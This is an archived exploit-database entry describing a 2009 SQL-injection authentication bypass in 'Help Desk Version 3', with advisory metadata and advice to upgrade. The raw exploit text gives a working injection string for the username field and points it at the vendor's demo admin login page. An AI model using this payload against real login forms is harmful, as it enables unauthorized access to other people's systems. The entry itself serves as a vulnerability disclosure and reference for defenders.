Help Desk Version 3 (Auth Bypass) Remote Sql Injection

vendor:

Help Desk Version 3

by:

Snakespc

CVSS

HIGH

Remote Sql Injection

CWE

Product Name: Help Desk Version 3

Affected Version From: 3

Affected Version To: 3

Patch Exists: YES

Related CWE: N/A

CPE: a:threepillarshelpdesk:help_desk_version_3

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Help Desk Version 3 (Auth Bypass) Remote Sql Injection

Help Desk Version 3 is vulnerable to a remote SQL injection vulnerability. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable application. This can allow the attacker to bypass authentication and gain access to the application.

Mitigation:

Upgrade to the latest version of Help Desk Version 3

Source

Exploit-DB raw data:

#--------------------------------------------------------
#Help Desk Version 3 (Auth Bypass) Remote Sql Injection
#--------------------------------------------------------
#Discovered By: Snakespc     ALGERIAN HaCkEr 
#Mail: snakespc@gmail.com       
#-------------------------------------------------------
#
#Script:Help Desk Version 3
#
#http://www.threepillarshelpdesk.com/
#--------------------------------------------------------
#Exploit:
#--------
#Demo:http://www.threepillarshelpdesk.com/demo/admin/login.php
#Username:admin' or '1=1 
#Password: No Thing !!!!
----------------------------------------------------------
Note:His0k4 Saha Ftooooork .....RANI TWAHCHTEK BZAFFFFFFFFFFFF 

# milw0rm.com [2009-09-15]